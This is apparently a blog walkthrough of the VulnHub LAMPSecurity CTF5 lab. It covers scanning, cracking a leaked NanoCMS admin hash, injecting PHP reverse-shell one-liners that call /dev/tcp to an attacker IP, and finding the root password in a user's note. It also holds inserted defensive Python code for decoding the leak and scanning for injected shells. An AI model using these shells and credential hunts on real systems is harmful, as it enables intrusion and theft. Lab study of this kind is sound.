vulnhub - LAMPSECURITY: CTF5

Posted by Mar10 on 2024-06-15


Information gathering

Port scan

nmap -sT --min-rate 10000 -p- 192.168.157.164

Detailed scan

sudo nmap -sT -sC -sV -O -p22,25,80,110,111,139,143,445,901,3306,44699 192.168.157.164

Vulnerability probing

sudo nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,44699 192.168.157.164

It returns a lot of information; each item can be tried in turn later.

Web penetration

First, browse through the website.

Notice that the blog page mentions NanoCMS.

A search turns up an RCE, but it requires a logged-in account.

Searching further reveals a password hash information disclosure vulnerability as well.

Visiting it confirms this, and the admin password (stored as a hash) is leaked:

a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:11;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

The password is successfully recovered: shannon.

Login works, but the page loads slowly.

For some reason I couldn't log in from my local browser, but the browser inside Kali works.

Find the code execution point and get a reverse shell
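The leaked data above is a PHP serialize() string, which is why one unauthenticated request hands out the admin username and hash together. The following parser is an added example (not NanoCMS code): it decodes the blob exactly as shown on this page into Python values, pulls out the credential fields, and flags the hash as a bare 32-character hex digest, i.e. an unsalted MD5-style hash that offline guessing recovers quickly, as the write-up's result ("shannon") shows.

```python
"""Decode the PHP serialize() blob leaked by NanoCMS and extract the stored
credentials. Added example, not NanoCMS code; LEAKED_BLOB is the exact string
shown on the page."""

import re

# The leaked NanoCMS data blob, copied verbatim from the vulnerable page.
LEAKED_BLOB = (
    'a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}'
    's:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}'
    's:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}'
    's:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:11;'
    's:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{'
    'i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}'
    's:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}'
    's:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";'
    's:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";'
    's:7:"version";s:4:"v_4f";}'
)


def php_unserialize(data: bytes):
    """Decode a PHP serialize() byte string. Supports s (string), i (int),
    b (bool), N (null) and a (array, returned as a dict). Works on bytes
    because PHP string lengths are byte counts, not character counts."""
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError(f"trailing data at offset {pos}")
    return value


def _parse(data: bytes, pos: int):
    tag = data[pos:pos + 1]
    if tag == b"N":                                  # N;
        return None, pos + 2
    if tag in (b"i", b"b"):                          # i:<n>;  b:<0|1>;
        end = data.index(b";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == b"b" else num), end + 1
    if tag == b"s":                                  # s:<len>:"<bytes>";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                            # skip the ':"' that opens the string
        raw = data[start:start + length]
        if data[start + length:start + length + 2] != b'";':
            raise ValueError(f"bad string terminator at offset {start + length}")
        return raw.decode("utf-8"), start + length + 2
    if tag == b"a":                                  # a:<count>:{<key><value>...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                              # skip ':{'
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            val, pos = _parse(data, pos)
            result[key] = val
        if data[pos:pos + 1] != b"}":
            raise ValueError(f"expected '}}' at offset {pos}")
        return result, pos + 1
    raise ValueError(f"unsupported type {tag!r} at offset {pos}")


def extract_credentials(blob: str) -> dict:
    """Return the username and password hash stored in a NanoCMS data blob."""
    cfg = php_unserialize(blob.encode("utf-8"))
    return {"username": cfg["username"], "password_hash": cfg["password"]}


def looks_like_unsalted_md5(value: str) -> bool:
    """A bare 32-char lowercase hex string with no salt or algorithm prefix."""
    return re.fullmatch(r"[0-9a-f]{32}", value) is not None


if __name__ == "__main__":
    creds = extract_credentials(LEAKED_BLOB)
    print(creds, "unsalted-md5-like:", looks_like_unsalted_md5(creds["password_hash"]))
```

The decoder is deliberately strict (it rejects trailing data and bad terminators) so it can also serve as a sanity check on any serialized CMS data file found exposed in a web root; the defensive fix is to keep such data files outside the document root or deny them in the web server configuration, and to store passwords with a salted, slow hash rather than a bare digest.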

<?php system("bash -i > /dev/tcp/192.168.157.161/7777 0>&1");?>
or
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.157.161/7777 0>&1'"); ?>

After saving, go back to the blog home page and click Home to trigger it.

Here you can also see the difference between the two shells.
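The injection above works because the CMS editor stores the page body as a file that the front end later includes as PHP. A defender reviewing such a site wants a quick content audit that flags PHP tags, command-execution calls and /dev/tcp redirects inside stored pages. The scanner below is an added example, not NanoCMS code; the flat "one .txt per page" directory layout and the sample page bodies are constructed assumptions, while the flagged payload is the one shown in this write-up.

```python
"""Scan stored CMS page bodies for injected PHP that executes commands or
opens a /dev/tcp socket. Added example, not NanoCMS code; the page directory
layout (one .txt file per page) is an assumption made for the demo."""

import re
import tempfile
from pathlib import Path

PHP_OPEN = re.compile(r"<\?php\b|<\?=", re.I)
EXEC_CALLS = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.I)
NET_REDIRECT = re.compile(r"/dev/(?:tcp|udp)/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}")


def classify(text: str) -> list:
    """Return the indicators found in one page body; an empty list means clean."""
    reasons = []
    if PHP_OPEN.search(text):
        reasons.append("php-tag")
        calls = sorted({m.group(1).lower() for m in EXEC_CALLS.finditer(text)})
        if calls:
            reasons.append("exec-call:" + ",".join(calls))
    if NET_REDIRECT.search(text):
        reasons.append("dev-tcp-redirect")
    return reasons


def scan_pages(page_dir) -> dict:
    """Map each flagged page file name to the list of indicators found in it."""
    findings = {}
    for path in sorted(Path(page_dir).glob("*.txt")):
        reasons = classify(path.read_text(errors="replace"))
        if reasons:
            findings[path.name] = reasons
    return findings


# Constructed sample pages: a benign page, a page with a harmless PHP tag, and a
# page carrying the reverse-shell call the write-up inserted through the editor.
SAMPLE_PAGES = {
    "home.txt": "<h1>Home</h1><p>Welcome to the blog.</p>",
    "contact.txt": "<p>Copyright <?php echo date('Y'); ?></p>",
    "backdoor.txt": '<p>Home</p><?php system("bash -i > /dev/tcp/192.168.157.161/7777 0>&1");?>',
}


def build_sample_dir() -> str:
    """Write the constructed sample pages to a temp directory and return its path."""
    d = tempfile.mkdtemp(prefix="cms-pages-")
    for name, body in SAMPLE_PAGES.items():
        Path(d, name).write_text(body)
    return d


if __name__ == "__main__":
    for name, reasons in scan_pages(build_sample_dir()).items():
        print(f"{name}: {', '.join(reasons)}")
```

A page that only contains a PHP tag is reported with the single indicator "php-tag" so that legitimate template snippets can be triaged separately from the high-confidence combination of an execution call plus a /dev/tcp redirect. Running this from a cron job against the CMS data directory, or as a pre-publish hook, catches the write-up's technique at the moment the page is saved rather than when Home is clicked.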

Privilege escalation

cat /etc/passwd

The users of interest are:

patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash

Search for traces

grep -R -i pass /home/* 2>/dev/null

Inspect the suspicious file

bash-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
  <last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
  <create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
  <cursor-position>15</cursor-position>
  <width>450</width>
  <height>360</height>
  <x>0</x>
  <y>0</y>
  <open-on-startup>False</open-on-startup>
</note>

50$cent should be the root password; upgrade to a tty and then log in as root.

python -c "import pty;pty.spawn('/bin/sh')"
